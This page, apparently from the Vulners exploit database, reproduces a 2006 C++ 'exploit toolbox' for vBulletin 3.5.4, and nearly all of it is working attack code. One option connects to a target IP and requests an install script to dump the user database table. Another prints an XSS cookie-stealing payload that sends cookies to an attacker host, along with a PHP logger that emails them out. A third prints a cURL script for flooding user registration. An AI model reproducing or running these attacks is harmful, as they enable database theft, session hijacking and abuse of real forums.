Vulners
Lucene search
vb-sploitbox.txt
`This Box continue the 3 vbulletin exploits, under it you can use the vbulletin install path exploit, the other two exploits can be only watched.
Code:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#include <iostream>
using namespace std;
string exploit;
string answer;
string answer2;
long s;
sockaddr_in addr;
char IPaddr[1024];
/*You have to change to the right path*/
char sget[] = "GET /install/upgrade_300b3.php?step=backup&do=sqltable&table=user HTTP/1.0\r\nConnection: Close\r\n\r\n";
char stry[41943040];
long I;
long M, J, K, L;
int i;
int main()
{
cout << "> Welcome to vbulletin 3.5.4 Exploit-Toolbox v.0.1.1" << endl;
cout << "> Here you can find all released vbullein 3.5.4 exploits" << endl;
cout << "> Press 1 for Install_path exploit" << endl;
cout << "> Press 2 for Xss vbulletin 3.5.x (test: 3.5.4)" << endl;
cout << "> Press 3 for vBulletin 3.5.4 Flood Exploit" << endl;
cout << "> Programm Author M4k3, www.pldsoft.com" << endl;
cout << "> Copyright by PLDsoft.com" << endl;
cout << "> Number? "; cin >> exploit;
cout << endl;
if (exploit == "1")
{
cout << " ____________________ " << endl;
cout << " |---PLDsoft.com------|" << endl;
cout << " |--------------------|" << endl;
cout << " |-vbulletin 3.5.4---|" << endl;
cout << " |install_path exploit|" << endl;
cout << " |____________________|" << endl;
cout << "##############################################" << endl;
cout << "vBulltin 3.5.4 exploit.....install path is open or not secure" << endl;
cout << "###############################################" << endl;
cout << endl;
cout << "Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com" << endl;
cout << "Remote : Yes" << endl;
cout << "Critical Level : Dangerous"<< endl;
cout << "############################################" << endl;
cout << "Affected software description :" << endl;
cout << endl;
cout << "Application : vbulletin" << endl;
cout << "version : latest version [ 3.60 Release 4 ]" << endl;
cout << "URL : http://www.vbulletin.com" << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Exploit:" << endl;
cout << endl;
cout << "www.vicitimsite.com/forumpath/install/upgrade.php?step=[writehereanylettersbutnotnumbers!]" << endl;
cout << endl;
cout << "when it works, you can download the database..." << endl;
cout << endl;
cout << "########################################" << endl;
cout << "Contact:" << endl;
cout << "Nick: M4k3" << endl;
cout << "E-mail: [email protected]" << endl;
cout << "Website: http://www.pldsoft.com" << endl;
cout << "_______End of Exploit______" << endl;
cout << endl;
sleep(1);
cout << "Use the exploit now?" << endl;
cout << "yes/no: "; cin >> answer;
}
if (answer == "yes")
{
cout << "Starting vbulletin 3.5.4 install_path exploit" << endl;
{
cout << "Insert IP: "; cin >> IPaddr;
M = 0;
J = 0;
K = 0;
L = 0;
while(IPaddr[i] != 0)
{
if(IPaddr[i] >= '0' && IPaddr[i] <= '9')
{
L *= 10;
L += IPaddr[i] - '0';
K++;
if(K > 3)
{
M = -1;
break;
}
}
else if(IPaddr[i] == '.')
{
if(K == 0)
{
M = -1;
break;
}
if(L >= 255)
{
M = -1;
break;
}
J++;
K = 0;
L = 0;
}
else
{
M = -1;
break;
}
M++;
}
if(M == -1 || J != 3)
{
cout << "> Invalid IP-Address!" << endl;
return 0;
}
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
addr.sin_family = AF_INET;
inet_aton(IPaddr, &addr.sin_addr);
addr.sin_port = htons(80);
if(connect(s, (sockaddr*) &addr, sizeof(sockaddr_in)))
{
printf("Failure: Connection Rested!\r\n");
close(s);
return 1;
}
if(send(s, sget, strlen(sget), 0) == 0)
{
printf("Failure: Not able to send packets!\r\n");
close(s);
return 2;
}
if((I = recv(s, stry, 41943040, 0)) == 0)
{
printf("Failure: Not able to receive packets!\r\n");
close(s);
return 3;
return 0;
}
close(s);
printf("Packets received succesfully!\r\nBytes of received Data: %d\r\n", I);
printf("%s", stry);
return 0;
}
}
else if (exploit == "2")
{
cout << "=> Xss Vbulletin 3.5.x ( test: 3.5.4 )"<< endl;
cout << "=> Author: SpiderZ"<< endl;
cout << "=> Sito: www.spiderz.tk"<< endl;
cout << endl;
cout << "_____________________________________________________________"<< endl;
cout << endl;
cout << "( 1 )"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$ip_adresse = $_SERVER['REMOTE_ADDR']; "<< endl;
cout << "if(!empty($ip_adresse)) "<< endl;
cout << "{ "<< endl;
cout << "echo 'il tuo ip ?: ',$ip_adresse; "<< endl;
cout << "} "<< endl;
cout << "else "<< endl;
cout << "{ "<< endl;
cout << "echo 'Impossible d\'afficher l\'IP'; "<< endl;
cout << "} "<< endl;
cout << "?> "<< endl;
cout << endl;
cout << "<a href=""log.php""></a><?"<< endl;
cout << "$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];"<< endl;
cout << "$day = date(""d"",time()); $month = date(""m"",time()); $year = date(""Y"",time());"<< endl;
cout << "if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;"<< endl;
cout << "else $visitor_info = $REMOTE_HOST;"<< endl;
cout << "$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;"<< endl;
cout << "$x1=`host $REMOTE_ADDR|grep Name`;"<< endl;
cout << "$x2=$REMOTE_PORT;"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$cookie = $_GET['c'];"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << "$today = date(""l, F j, Y, g:i a"") ;"<< endl;
cout << "$subject = ""Xss Vbulletin"" ;"<< endl;
cout << "$message = ""Xss: Hacking"""<< endl;
cout << "Ip: $ip_adresse "<< endl;
cout << "Cookie: $cookie"<< endl;
cout << "Url: $base"<< endl;
cout << "porta usata: $xx1"<< endl;
cout << "remote port: $x2"<< endl;
cout << "Giorno & Ora : $today \n"<< endl;
cout << endl;
cout << "$from = ""From: $myemail\r\n"";"<< endl;
cout << "mail($myemail, $subject, $message, $from);"<< endl;
cout << "?>"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "<?php"<< endl;
cout << "$myemail = ""YOUR ADDRESS E-MAIL"";"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "( 2 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Name file: image.gif"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "<pre a='>' onmouseover='document.location=""http://YOUR ADDRESS WEB.com/exploit.php?"" "<< endl;
cout << "c=""+document.cookie' b='</pre' >"""<< endl;
cout << endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "location=""http://YOUR ADDRESS WEB.com"""<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "( 3 )"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "Like Using"<< endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << "1 new thread"<< endl;
cout << "2 <a href=""http://YOUR ADDRESS WEB.com/IMAGE.GIF"" target=""_blank"">BEAUTIFUL GIRL</a>'"<< endl;
cout << "3 Submit"<< endl;
cout << "4 It waits for"<< endl;
cout << endl;
cout << "--------------------------------------------------------------------"<< endl;
cout << endl;
cout << endl;
cout << "# www.spiderz.tk " << endl;
cout << endl;
cout << "_______End of Exploit______" << endl;
}
else if (exploit == "3")
{
cout << "Script : vBulletin Version 3.5.4" << endl;
cout << endl;
cout << "site : www.vbulletin.com" << endl;
cout << endl;
cout << "Exploit by : x-boy" << endl;
cout << endl;
cout << "E-mail : Dicomdk (at) gmail (dot) com [email concealed]" << endl;
cout << endl;
cout << "Type : Registration flood in register.php" << endl;
cout << endl;
cout << "Thanks to : Simo64" << endl;
cout << endl;
cout << endl;
cout << "Code of exploit (For english version , you can change it to other language)=> exploit.php" << endl;
cout << endl;
cout << "cURL Must be activated (http://curl.haxx.se)" << endl;
cout << endl;
cout << "Sorry for my bad English :-)" << endl;
cout << endl;
cout << endl;
cout << "<?" << endl;
cout << endl;
cout << "set_time_limit(60);" << endl;
cout << endl;
cout << "//You can change 10 to other numbers" << endl;
cout << endl;
cout << "for($i = 1 ; $i <= 10 ; $i++)" << endl;
cout << endl;
cout << "{" << endl;
cout << endl;
cout << "//to put curl to send POST request" << endl;
cout << endl;
cout << "$ch = curl_init();" << endl;
cout << endl;
cout << "//change http://localhost/vb3 to the url of the script" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POST , 1) ;" << endl;
cout << endl;
cout << "curl_setopt($ch , CURLOPT_POSTFIELDS ," << endl;
cout << "'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5" << endl;
cout << "=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&password" << endl;
cout << "con" << endl;
cout << "firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm" << endl;
cout << "ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST" << endl;
cout << "corrections always on&options[showemail]=1');" << endl;
cout << endl;
cout << "curl_exec($ch);" << endl;
cout << endl;
cout << "curl_close($ch);" << endl;
cout << endl;
cout << "}" << endl;
cout << endl;
cout << "//Flood finished good luck" << endl;
cout << endl;
cout << "?>" << endl;
cout << endl;
cout << "____End of Exploit___" << endl;
}
else
{
cout << "File not found / Failed to open file" << endl;
}
cout << endl;
cout << endl;
cout << endl;
cout << "Copyright and Programming by PLDsoft.com, [Author M4k3]" << endl;
cout << "Contact m4k3@pldsecurity[dot]de" << endl;
return 0;
}
More Informations by: PLDsoft.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4